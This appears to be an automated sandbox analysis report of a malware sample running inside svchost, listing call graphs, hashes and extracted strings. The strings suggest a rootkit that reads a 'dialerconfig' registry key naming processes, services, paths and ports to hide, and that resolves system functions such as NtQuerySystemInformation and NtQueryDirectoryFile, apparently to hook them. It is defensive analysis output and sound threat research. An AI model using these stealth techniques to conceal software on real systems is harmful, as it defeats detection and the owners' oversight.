20825->20820 20831 16c21161872 20827->20831 20832 16c21161889 RegOpenKeyExW 20827->20832 20849 16c2116104c 6 API calls 20828->20849 20829 16c21161809 RegCloseKey 20829->20822 20850 16c2116104c 6 API calls 20831->20850 20835 16c211618ad 20832->20835 20836 16c211618c4 RegCloseKey 20832->20836 20833 16c21161844 RegCloseKey 20833->20827 20851 16c2116104c 6 API calls 20835->20851 20836->20806 20838 16c2116187f RegCloseKey 20838->20832 20839 16c211618ba RegCloseKey 20839->20836 20840->20798 20841->20800 20842->20802 20843->20804 20844->20813 20845->20817 20846->20824 20847->20825 20848->20829 20849->20833 20850->20838 20851->20839 20852 16c2116a568 20853 16c2116a581 20852->20853 20862 16c2116a57d 20852->20862 20864 16c2116cc38 28 API calls 20853->20864 20855 16c2116a586 20865 16c2116d130 GetEnvironmentStringsW 20855->20865 20859 16c2116a593 20881 16c2116b8d8 6 API calls _set_errno_from_matherr 20859->20881 20860 16c2116a5a0 20880 16c2116b8d8 6 API calls _set_errno_from_matherr 20860->20880 20864->20855 20866 16c2116d202 20865->20866 20867 16c2116d15e 20865->20867 20868 16c2116a58b 20866->20868 20869 16c2116d20a FreeEnvironmentStringsW 20866->20869 20867->20867 20882 16c2116d080 WideCharToMultiByte 20867->20882 20868->20859 20879 16c2116a5d4 18 API calls 4 library calls 20868->20879 20869->20868 20879->20860 20880->20859 20881->20862 20883 16c21132908 20885 16c21132936 20883->20885 20884 16c21132a2b LoadLibraryA 20884->20885 20885->20884 20886 16c21132aa7 20885->20886

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction ID: 1c95bedcf900a1a35f12d56bbcb145ef63a0264c0f41dfed7472d73d16dbca47
                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction Fuzzy Hash: ADE03975661600C6E7048B62EC243AA37E1EB98B02F488028CE8907750DF7EC4DAC780

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                • String ID:
                                                • API String ID: 1683269324-0
                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction ID: c670110d79c115e19f884479ef144f889e3b3d9098271a59c1f83876c6625d83
                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction Fuzzy Hash: 00113C7D63468141F7219725AD2A7FA6290B7F4307F54001D9FEA89A94EF3BC0C586D0

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: EnvironmentStrings$Free
                                                • String ID:
                                                • API String ID: 3328510275-0
                                                • Opcode ID: 6655d75d81b3f5d3cdd8ffb71a0db4099f6c7b3c7a68dca63c88ca8711a21244
                                                • Instruction ID: 56c88e1f27c5e69a91e5fc11674a148bbff9665defafe7eb40423a2fbe6f01a7
                                                • Opcode Fuzzy Hash: 6655d75d81b3f5d3cdd8ffb71a0db4099f6c7b3c7a68dca63c88ca8711a21244
                                                • Instruction Fuzzy Hash: 48218535B147D081EA209F176C102AAA6A4F7E4BD1F484129DFD963FD4DF7BC4928380

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 0000016C21161650: GetProcessHeap.KERNEL32 ref: 0000016C2116165B
                                                  • Part of subcall function 0000016C21161650: HeapAlloc.KERNEL32 ref: 0000016C2116166A
                                                  • Part of subcall function 0000016C21161650: RegOpenKeyExW.ADVAPI32 ref: 0000016C211616DA
                                                  • Part of subcall function 0000016C21161650: RegOpenKeyExW.ADVAPI32 ref: 0000016C21161707
                                                  • Part of subcall function 0000016C21161650: RegCloseKey.ADVAPI32 ref: 0000016C21161721
                                                  • Part of subcall function 0000016C21161650: RegOpenKeyExW.ADVAPI32 ref: 0000016C21161741
                                                  • Part of subcall function 0000016C21161650: RegCloseKey.ADVAPI32 ref: 0000016C2116175C
                                                  • Part of subcall function 0000016C21161650: RegOpenKeyExW.ADVAPI32 ref: 0000016C2116177C
                                                  • Part of subcall function 0000016C21161650: RegCloseKey.ADVAPI32 ref: 0000016C21161797
                                                  • Part of subcall function 0000016C21161650: RegOpenKeyExW.ADVAPI32 ref: 0000016C211617B7
                                                  • Part of subcall function 0000016C21161650: RegCloseKey.ADVAPI32 ref: 0000016C211617D2
                                                  • Part of subcall function 0000016C21161650: RegOpenKeyExW.ADVAPI32 ref: 0000016C211617F2
                                                • Sleep.KERNEL32 ref: 0000016C21161C43
                                                • SleepEx.KERNELBASE ref: 0000016C21161C49
                                                  • Part of subcall function 0000016C21161650: RegCloseKey.ADVAPI32 ref: 0000016C2116180D
                                                  • Part of subcall function 0000016C21161650: RegOpenKeyExW.ADVAPI32 ref: 0000016C2116182D
                                                  • Part of subcall function 0000016C21161650: RegCloseKey.ADVAPI32 ref: 0000016C21161848
                                                  • Part of subcall function 0000016C21161650: RegOpenKeyExW.ADVAPI32 ref: 0000016C21161868
                                                  • Part of subcall function 0000016C21161650: RegCloseKey.ADVAPI32 ref: 0000016C21161883
                                                  • Part of subcall function 0000016C21161650: RegOpenKeyExW.ADVAPI32 ref: 0000016C211618A3
                                                  • Part of subcall function 0000016C21161650: RegCloseKey.ADVAPI32 ref: 0000016C211618BE
                                                  • Part of subcall function 0000016C21161650: RegCloseKey.ADVAPI32 ref: 0000016C211618C8
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                • String ID:
                                                • API String ID: 1534210851-0
                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction ID: 25e5ff9fc54f8806c5b9a58355ab4f0658ee015b650a5c7161e1393e7ca698c5
                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction Fuzzy Hash: BF31EC7DA0068191EB50AF26DE653FE1294A7F4BD3F1440298F8987A95DE33C8D082D0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 81 16c21163930-16c2116393b 82 16c2116393d-16c21163950 StrCmpNIW 81->82 83 16c21163955-16c2116395c 81->83 82->83 84 16c21163952 82->84 84->83
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: dialer
                                                • API String ID: 0-3528709123
                                                • Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                • Instruction ID: 230a53cb4240d8ead6065b66432fd98b6d01c3fd884062731801f27733af343c
                                                • Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                • Instruction Fuzzy Hash: BBD05E3836124B86EB149FA19CA12B22350ABA4716F4880288F5502A94E72AC9CECA50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 85 16c21132908-16c21132973 call 16c21130f34 * 4 94 16c21132b8b 85->94 95 16c21132979-16c2113297c 85->95 97 16c21132b8d-16c21132ba9 94->97 95->94 96 16c21132982-16c21132985 95->96 96->94 98 16c2113298b-16c2113298e 96->98 98->94 99 16c21132994-16c211329b2 98->99 99->94 101 16c211329b8-16c211329dc call 16c21130d6c 99->101 104 16c211329de-16c21132a09 call 16c21130d6c 101->104 105 16c21132a0b-16c21132a12 101->105 104->105 107 16c21132ab2-16c21132ab9 105->107 108 16c21132a18-16c21132a25 105->108 109 16c21132abf-16c21132ad6 107->109 110 16c21132b6c-16c21132b89 107->110 108->107 112 16c21132a2b-16c21132a39 LoadLibraryA 108->112 109->110 115 16c21132adc 109->115 110->97 113 16c21132a9d-16c21132aa5 112->113 114 16c21132a3b-16c21132a45 112->114 113->112 117 16c21132aa7-16c21132aac 113->117 116 16c21132a48-16c21132a4c 114->116 119 16c21132ae2-16c21132af7 115->119 120 16c21132a4e-16c21132a52 116->120 121 16c21132a9a 116->121 117->107 122 16c21132b5b-16c21132b66 119->122 123 16c21132af9-16c21132b0a 119->123 124 16c21132a7d-16c21132a87 120->124 125 16c21132a54-16c21132a7b 120->125 121->113 122->110 122->119 127 16c21132b0c-16c21132b13 123->127 128 16c21132b15-16c21132b19 123->128 132 16c21132a8d-16c21132a98 124->132 125->132 129 16c21132b48-16c21132b59 127->129 130 16c21132b24-16c21132b28 128->130 131 16c21132b1b-16c21132b22 128->131 129->122 129->123 133 16c21132b3a-16c21132b3e 130->133 134 16c21132b2a-16c21132b38 130->134 131->129 132->116 133->129 135 16c21132b40-16c21132b43 133->135 134->129 135->129
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2633076698.0000016C21130000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21130000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21130000_svchost.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction ID: 48df7943838d973feb0a730a1a0509e7f90eadfe302c5dc4d71423d429a5b180
                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction Fuzzy Hash: F86112367016D087EA6CDF1598607BCB391FBA4B95F148019DF9907B88DA39D893C740

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 151 16c211cb860-16c211cb86f 152 16c211cb871-16c211cb87d 151->152 153 16c211cb87f-16c211cb88f 151->153 152->153 154 16c211cb8c2-16c211cb8cd call 16c211cb840 152->154 155 16c211cb8a6-16c211cb8be HeapAlloc 153->155 159 16c211cb8cf-16c211cb8d4 154->159 156 16c211cb8c0 155->156 157 16c211cb891-16c211cb898 call 16c211ce650 155->157 156->159 157->154 163 16c211cb89a-16c211cb8a4 call 16c211c9d24 157->163 163->154 163->155
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: AllocHeap
                                                • String ID:
                                                • API String ID: 4292702814-0
                                                • Opcode ID: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
                                                • Instruction ID: f278b5c8437950f7670d114c9856fe1f3689ac53576ff95283a93907405a7eed
                                                • Opcode Fuzzy Hash: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
                                                • Instruction Fuzzy Hash: BAF04FBC71270548FE655B615C313F612806FE4782F1844288F8AE6AC1DA3EC4C44296

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 136 16c2116b860-16c2116b86f 137 16c2116b871-16c2116b87d 136->137 138 16c2116b87f-16c2116b88f 136->138 137->138 139 16c2116b8c2-16c2116b8cd call 16c2116b840 137->139 140 16c2116b8a6-16c2116b8be HeapAlloc 138->140 145 16c2116b8cf-16c2116b8d4 139->145 141 16c2116b8c0 140->141 142 16c2116b891-16c2116b898 call 16c2116e650 140->142 141->145 142->139 148 16c2116b89a-16c2116b8a4 call 16c21169d24 142->148 148->139 148->140
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: AllocHeap
                                                • String ID:
                                                • API String ID: 4292702814-0
                                                • Opcode ID: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
                                                • Instruction ID: bf042cafed8894682b5b61f49a49779834435a07309af86f7596f17dd5ae5566
                                                • Opcode Fuzzy Hash: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
                                                • Instruction Fuzzy Hash: 68F0496830268549FE65AB669C203F502886FF4B42F1854388F8A87BC1EB3FC4C54298
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                • API String ID: 2119608203-3850299575
                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction ID: ec41fbd1c173e4c5d78fe47847e12f8d5f7be49cf8077980a5447e00c36ff842
                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction Fuzzy Hash: 6DB1917A22079582EB599F25C8607FA63A4F7A4F86F14501ADF8963F94DF36C8C0C781

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 356 16c21162cdc-16c21162d55 call 16c2117ecc0 359 16c21163090-16c211630b3 356->359 360 16c21162d5b-16c21162d61 356->360 360->359 361 16c21162d67-16c21162d6a 360->361 361->359 362 16c21162d70-16c21162d73 361->362 362->359 363 16c21162d79-16c21162d89 GetModuleHandleA 362->363 364 16c21162d9d 363->364 365 16c21162d8b-16c21162d9b call 16c21173090 363->365 367 16c21162da0-16c21162dbe 364->367 365->367 367->359 370 16c21162dc4-16c21162de3 StrCmpNIW 367->370 370->359 371 16c21162de9-16c21162ded 370->371 371->359 372 16c21162df3-16c21162dfd 371->372 372->359 373 16c21162e03-16c21162e0a 372->373 373->359 374 16c21162e10-16c21162e23 373->374 375 16c21162e33 374->375 376 16c21162e25-16c21162e31 374->376 377 16c21162e36-16c21162e3a 375->377 376->377 378 16c21162e3c-16c21162e48 377->378 379 16c21162e4a 377->379 380 16c21162e4d-16c21162e57 378->380 379->380 381 16c21162f4d-16c21162f51 380->381 382 16c21162e5d-16c21162e60 380->382 383 16c21163082-16c2116308a 381->383 384 16c21162f57-16c21162f5a 381->384 385 16c21162e72-16c21162e7c 382->385 386 16c21162e62-16c21162e6f call 16c21161a14 382->386 383->359 383->374 387 16c21162f5c-16c21162f68 call 16c21161a14 384->387 388 16c21162f6b-16c21162f75 384->388 390 16c21162eb0-16c21162eba 385->390 391 16c21162e7e-16c21162e8b 385->391 386->385 387->388 393 16c21162f77-16c21162f84 388->393 394 16c21162fa5-16c21162fa8 388->394 397 16c21162ebc-16c21162ec9 390->397 398 16c21162eea-16c21162eed 390->398 391->390 396 16c21162e8d-16c21162e9a 391->396 393->394 402 16c21162f86-16c21162f93 393->402 403 16c21162faa-16c21162fb3 call 16c21161d28 394->403 404 16c21162fb5-16c21162fc2 lstrlenW 394->404 405 16c21162e9d-16c21162ea3 396->405 397->398 406 16c21162ecb-16c21162ed8 397->406 400 16c21162eef-16c21162ef9 call 16c21161d28 398->400 401 16c21162efb-16c21162f08 lstrlenW 398->401 400->401 413 16c21162f43-16c21162f48 400->413 409 16c21162f0a-16c21162f14 401->409 410 16c21162f2b-16c21162f3d call 16c21163930 401->410 411 16c21162f96-16c21162f9c 402->411 403->404 422 16c21162ffa-16c21163005 403->422 415 16c21162fc4-16c21162fce 404->415 416 16c21162fe5-16c21162fef call 16c21163930 404->416 405->413 414 16c21162ea9-16c21162eae 405->414 407 16c21162edb-16c21162ee1 406->407 407->413 417 16c21162ee3-16c21162ee8 407->417 409->410 420 16c21162f16-16c21162f29 call 16c21161554 409->420 410->413 425 16c21162ff2-16c21162ff4 410->425 421 16c21162f9e-16c21162fa3 411->421 411->422 413->425 414->390 414->405 415->416 426 16c21162fd0-16c21162fe3 call 16c21161554 415->426 416->425 417->398 417->407 420->410 420->413 421->394 421->411 429 16c2116307c-16c21163080 422->429 430 16c21163007-16c2116300b 422->430 425->383 425->422 426->416 426->422 429->383 434 16c21163013-16c2116302d call 16c211686a0 430->434 435 16c2116300d-16c21163011 430->435 437 16c21163030-16c21163033 434->437 435->434 435->437 440 16c21163056-16c21163059 437->440 441 16c21163035-16c21163053 call 16c211686a0 437->441 440->429 442 16c2116305b-16c21163079 call 16c211686a0 440->442 441->440 442->429
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                • API String ID: 2119608203-3850299575
                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction ID: c25c6903b18604247aa998f6dfb932b9c16f7968d24fd35738e45ecd6bb27cdb
                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction Fuzzy Hash: 05B15B3A22169081EB598F25DD607FA73A4F7A4B86F54501AEF8957F94DB37C8C1C380
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                • String ID:
                                                • API String ID: 3140674995-0
                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction ID: 81f89bdae6f822c9869372a08e957f248fa24451829395cb080722d84ae174de
                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction Fuzzy Hash: 8A315E7A214B8096EB609F60ECA03EE7360F794745F44442ADF8E57B98EF79C588CB50
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                • String ID:
                                                • API String ID: 3140674995-0
                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction ID: 264e9ea3838fd8524de9637e4cffaaa99a35a9bafdb9f78695b4dc9d211d3e1a
                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction Fuzzy Hash: 97315E76214B8086EB609F60EC607EE73A0F7A4745F44442ADF8D47B98EF3AC589C750
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction ID: 705bf76ff624321999bfa1bb59edd8a3a35922981169caafb23c140a560b3798
                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction Fuzzy Hash: 7931393A214B8096DB60CB25E8503EE73A4F798795F50012AEF9D52B94DF39C585CB40
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction ID: 7094580ebbedd9afd61a534ee597722aebcf73b087f2fb8e064fbcc1226bfce0
                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction Fuzzy Hash: DB312A3A214B8086DB608F25E8503EE73A4F7A9795F54012AEF9D47B94DF3AC586CB40
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                • String ID:
                                                • API String ID: 1443284424-0
                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction ID: 6f913e93f5d48379b5d36f015813af264e6fb4329d58b97750b15f176ecbebd8
                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction Fuzzy Hash: 70E1143A724B809AEB00CF64D8502EE7BB1F3957C9F10411ADF8A57F99DA39C596C780
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                • String ID:
                                                • API String ID: 1443284424-0
                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction ID: d0a5a59f048ed87dd58a075fba967e5e3d3b94f526c38f774114693f182d7af0
                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction Fuzzy Hash: 56E1E136718B808AE700CF64D8602EE7BB1F396789F14411ADF8A57F99DB36C596C780

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                • API String ID: 106492572-2879589442
                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction ID: 94c3d14fc300cb82dc38e92c8f5b15372d93f8eb11a0fdc8245e550fa48adbf2
                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction Fuzzy Hash: 8B71F87E320B50C5EB109F65EC606EA67A4F7E4B8AF405119DF8D57A68DF3AC494C380

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                • API String ID: 106492572-2879589442
                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction ID: 0b136447f94d6e826ee1d2813973f9d15c31740d21398d34408adc4a2faa0209
                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction Fuzzy Hash: C1710C3A710A5085EB109F65EC606E967B4F7E4B8AF405119DF8D57F68DF3AC485C380

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                • String ID: d
                                                • API String ID: 2005889112-2564639436
                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction ID: 0f8a8ebe5fd4ef37318d40ee3baee161bd6483ae9e5b25de17ee9b09ef9d83c4
                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction Fuzzy Hash: 9A514EBA224B45D3EB14CF62E9543AAB3A1F7E8B85F048128DF8947B14DF39C095C780

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                • String ID: d
                                                • API String ID: 2005889112-2564639436
                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction ID: 622ac38e8802332a2917ce51547cf687e17fdbf1616d804901f4461195bbe5d1
                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction Fuzzy Hash: DF51497A654B8496EB14CB62E9543AAB3A1F7D8B81F048128DF8907F14DF3AC096C780

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                • API String ID: 4175298099-1975688563
                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction ID: e367c40c64415ebe3df5ba29661f233409e366902858b138c3f25d2d667f4bc7
                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction Fuzzy Hash: 3E31B87C121A46A1EF08DF55EC717F42321A7E4B47F80551B9F8922DA1AE7AC2C9C3C2

